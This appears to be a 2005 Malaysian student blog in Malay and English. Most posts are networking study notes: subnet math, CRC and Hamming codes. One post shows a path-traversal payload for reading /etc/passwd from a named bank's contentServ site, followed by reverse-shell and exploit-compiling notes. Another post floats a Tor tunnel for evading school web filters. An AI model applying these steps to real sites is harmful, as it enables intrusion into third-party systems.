aku ada terpikir satu projek..
bolehker kita upload file html (php, asp ker aper ker dsb) ke web hosting (e.g geocities) kemdian kita browse ke situ sblm kita masuk web site yg disahkan illegal oleh web filtering skool dan universiti....
kaedahnya cam kita install tor dekat server diluar, kemdian kita gunakan server tersebut sbg tunnel utk kita browse website yg tdk dibenarkan oleh organisasi LAN yg kita pakai...
objektifnya : membuktikan web filtering terpaksa mengupdate signiture (mcm antivirus) kerana macam2 programming boleh buat utk tunneling based on html..
old time as known as My QWERTY. I love to share tips and trick to everybody.
::sh::My QWERTY
Friday, December 02, 2005
Idea - Signiture Update on Web Filter
in bahasa
Friday, November 11, 2005
Subnet mask - range calculation
how to calculate subnet mask?
e.g - 200.10.10.0 --> usable host 16
what is 6th usable subnet range?
: from here we know every subnet must have 16 hosts..
so 6th usable subnet range is from 6th to 7th subnet
6th subnet address = 16 x 6 = 96
7th subnet address = 16 x 7 = 112
the answer is : 200.10.10.96 to 200.10.10.111
what is subnet number for 4th usable subnet?
: 16 x 4 = 64
the answer is : 200.10.10.64
what is subnet broadcast address for the 3rd usable subnet?
: take 4th subnet becoz the broadcast address of 3rd subnet is before 4th subnet address.
16 x 4 =64
the answer is : 200.10.10.63
what are the assignable address for the 5th usable subnet?
: 16 x 5 = 80 ; 16 x 6 = 96
range 200.10.10.80 to 200.10.10.95 ... then exclude address and broadcast
the answer is : 200.10.10.81 to 200.10.10.94
e.g - 200.10.10.0 --> usable host 16
what is 6th usable subnet range?
: from here we know every subnet must have 16 hosts..
so 6th usable subnet range is from 6th to 7th subnet
6th subnet address = 16 x 6 = 96
7th subnet address = 16 x 7 = 112
the answer is : 200.10.10.96 to 200.10.10.111
what is subnet number for 4th usable subnet?
: 16 x 4 = 64
the answer is : 200.10.10.64
what is subnet broadcast address for the 3rd usable subnet?
: take 4th subnet becoz the broadcast address of 3rd subnet is before 4th subnet address.
16 x 4 =64
the answer is : 200.10.10.63
what are the assignable address for the 5th usable subnet?
: 16 x 5 = 80 ; 16 x 6 = 96
range 200.10.10.80 to 200.10.10.95 ... then exclude address and broadcast
the answer is : 200.10.10.81 to 200.10.10.94
Thursday, November 10, 2005
Data Can Be Corrupted During Transmission
Data can be corrupted during transmission. For reliable communication, errors must be detected and corrected.
Single-Bit err vs Burs err --> only 1 err vs more than 1
Error detection uses the concept of redundancy, which means adding extra bits for detecting errors at the destination.
CRC is one of Detection Method (lain²: parity check [vrc + lrc], checksum)
crc use polynomial as divisor. e.g. x7 + x5 + x² + x + 1 --> 10100111
b4 sent, generate remainder as redundant bit.
e.g data=100100 divisor=1101
then sent data+remainder
receive.. (data+remainder) divide 1101 must get remainder '0'. else --> error.
in data correction, can use Hamming Code.
place a redundant bit to take care of every single bit of data..
then put the redundant bit.. r8, r4, r2, r1
do check.. if error, calculate which bit is error...
Error detection uses the concept of redundancy, which means adding extra bits for detecting errors at the destination.
CRC is one of Detection Method (lain²: parity check [vrc + lrc], checksum)
crc use polynomial as divisor. e.g. x7 + x5 + x² + x + 1 --> 10100111
b4 sent, generate remainder as redundant bit.
e.g data=100100 divisor=1101
then sent data+remainder
receive.. (data+remainder) divide 1101 must get remainder '0'. else --> error.
in data correction, can use Hamming Code.
place a redundant bit to take care of every single bit of data..
then put the redundant bit.. r8, r4, r2, r1
do check.. if error, calculate which bit is error...
Tuesday, October 18, 2005
Idea - Study nmap Source code
mission: source code nmap
objective: to know how scanner created
vision: we can create our own scanner
how to do:
- download nmap with source code
- use nmap with option provided
- compile nmap
- read source code
when:
-during UiTM semester holiday...
team:
-SIGs "Security & Network Admin" members... ;)
objective: to know how scanner created
vision: we can create our own scanner
how to do:
- download nmap with source code
- use nmap with option provided
- compile nmap
- read source code
when:
-during UiTM semester holiday...
team:
-SIGs "Security & Network Admin" members... ;)
Tuesday, September 27, 2005
Read /etc/passwd from contentServ Vuln.
in Bahasa
Gebhard Bank » ad-hoc-Meldung vom 15.07.2005: Gebhard Bank weist ... - [ Translate this page ]
www.gebhardbank.de/contentserv/3.1/gebhardbank.de/index.php?StoryID=2291 - Similar pages
[ More results from www.gebhardbank.de ]
(cuba ushar http://www.packetstormsecurity.org ruangan exploit)
Sistem yang menggunakan contentServ yang disyaki mempunyai vuln.
contentServ tu salah satu cms.
cms tu content management system, satu sistem portal yang telah disiapkan utk user buat sendiri isi portal tsbt.
kemdian googlekan utk cari laman web mana yang pakai contentServ nih..
contohnya
Gebhard Bank » ad-hoc-Meldung vom 15.07.2005: Gebhard Bank weist ... - [ Translate this page ]
www.gebhardbank.de/contentserv/3.1/gebhardbank.de/index.php?StoryID=2291 - Similar pages
[ More results from www.gebhardbank.de ]
next step taip jer tambahan (yg diceritakan dalam packetstorm itu) kelihatan spt ini
http://www.gebhardbank.de/contentserv/3.1/..../etc/passwd%00
dah boleh baca /etc/passwd nyer ker.. hehehehe
okaylah next step, mungkin kita boleh pakai reverse telnet
nota sendiri:
reverse telnet adalah salah satu teknik untuk attacker memasuki ruang sistem dengan memberi arahan kepada sistem yang hendak dimasuki (contohnya oleh en. suki) membuat telnet ke atas sistem attacker yang di pasang tool untuk reverse telnet ini. contoh tool utk reverse telnet ini ialah netcat (nc)
Exploit Compiling (on C language)
1. get the exploit
(eg. http://www.packetstormsecurity.org/0509-ex.../snortrigger.c)
2. run gcc on ur linux (or whatever c-compiler)
[root@kambing]# gcc snortrigger.c
3. redi tu yus
[root@kambing]# ./a.out
Usage: ./a.out [spoofed srcip]
Default srcip = 200.31.33.70
(eg. http://www.packetstormsecurity.org/0509-ex.../snortrigger.c)
2. run gcc on ur linux (or whatever c-compiler)
[root@kambing]# gcc snortrigger.c
3. redi tu yus
[root@kambing]# ./a.out
Usage: ./a.out
Default srcip = 200.31.33.70
Thursday, August 11, 2005
Idea - Building a new Distro
in Bahasa:
google taip keyword distro
rupa2nya beratus dan beribu distro linux (or bsd) yang dihasilkan...
tengok list kat distrowatch.com pun mak ai.. macam2 nama yang ada...
katakanlah kita dah configure linux dengan memasukkan elemen2 yang penting sahaja iaitu yang sesuai dengan tugasan kita.
contohnya, kalau linux utk security, kita akan letak banyak tool, script yang siap dicompile serta xploit2 yang kita amik dari kebanyakkan homepage dan yang terkini (spt. packetstormsecurity.org).. adakah anda tahu cemmana nak hasilkan installer cd bagi linux tsbt???
kita boleh namakan dengan distro kita sendiri dan simpan dalam bentuk iso.
so kalau nak pakai atau nak backup kita just run dari pada cd yang dah ada iso tersebut.
persoalannya..
adakah anda tahu cemmana nak buat cd tersebut???
anda tahu atau tak tahu??
kalau tahu bagaimanakah caranya???
aku ada baca 2 artikel... [link1] [link2]
satu dari distro maker... dia mengambil setahun setengah utk membina distro utk companynya....
dua dari knoppix remasterer.. dia bagi tahu, hanya dua hingga lima jam sahaja utk remaster knoppix nih...
pastu aku baca how to remaster knoppix kat knoppix site..
mmg dia bagitau step by step..
Subscribe to:
Posts (Atom)